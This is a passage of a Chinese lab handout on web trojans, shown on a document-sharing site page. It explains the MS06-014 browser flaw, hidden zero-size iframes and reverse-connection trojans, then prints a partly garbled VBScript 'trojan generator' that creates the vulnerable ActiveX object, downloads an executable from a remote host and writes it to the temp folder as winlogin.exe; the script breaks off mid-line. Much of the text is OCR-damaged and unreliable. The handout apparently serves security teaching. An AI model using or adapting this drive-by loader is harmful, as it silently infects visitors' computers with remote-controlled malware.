网页木马实验原理.docxVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

网页木马原理及相关定义

浏览器是用来解释和显示万维网文档的程序,已经成为用户上网时必不可少的工具之一。

“网页木马”由其植入方式而得名,是通过浏览网页的方式被植入到被控主机上,并对被控主机进行控制。与其它网页不同,木马网页是黑客精心制作的,木马网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

如果打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那么用户将会面临巨大的威胁。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。本练习中,我们利用微软的MS06014漏洞,完成网页木马的植入。

名词解释

MS06014漏洞

MS06014漏洞存在于MicrosoftDataAccessComponents,利用微软的HTMLObject标签的一个漏洞,Object标签主要是用来把ActiveX控件插入到HTML页面里。由于加载程序没有根据描述远程Object数据位置的参数检查加载文件的性质,因此Web页面里面的程序就会不经过用户的确认而自动执行。

iframe标签

iframe也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效

果。例如:

|iframesrc=^http://ww.jlcss.con/irides,htmVname=,vjlcssvidth=CTheight=CTframeticirder=CT

被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。如果把宽(width)、高(height)、边框(frameborder)都设置为了“0”,代码插入到首页后,首页不会发生变化,但是嵌入的网页实际上已经打开。

反弹端口型木马

分析防火墙的特性后可以发现,防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。服务端通常会把打开的端口伪装成应用软件的端口,从而进一步降低被防火墙发现的概率。

网页木马生成脚本

通常网页木马是通过“网马生成器”将木马安装程序的下载地址附加在网页上的,进而达到用户浏览含有木马的网页即自动下载安装程序的目的。下面给出一个“网马生成器”脚本,其中“//”后面的文字是对代码的注释。实验中,同学们改动此脚本,自己动手生成网页木马。

html

scriptlanguage^VBScript17

onerrorresumenext

dl=http:/7呈佥抒1妣屡:9090/Server_Settp.eKe 定义dl”为木马下载地址

Setdf=document.createElementobject) /7M立一个对彝

df.setAttributeclassid^clsid:BD5.6.C55 5A3-1ID 3At.Q.QC04FC29E36

”声明网马的clsid

str=Microsoft.KMLHTTP 使用KMLhttp对象

Setk=df.CreateObject(str^

strl=Adodb.Stream

setS=df.createobject(strlj) //用Adodb.Stream执行文件操

S.type=1

池AGET

k.Openstr2jdl.Falsek.Send

fname^,winlogin.eze

/V使用睛t力可狭取不与乂1干

/V根据木马地址荻取木马文件

/V定义木马的文件名

//用FileSystemObjec执行文件操作,这次是写入文件

setF=df.createobject(Scripting.FileSystemObject

settmp=F.GetSpecialFolder(2) /y缺取临时文件夹路径

fname1=F.BuildPath(tmpjfname1)

S.ope

文档评论(0)

suijiazhuang1 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档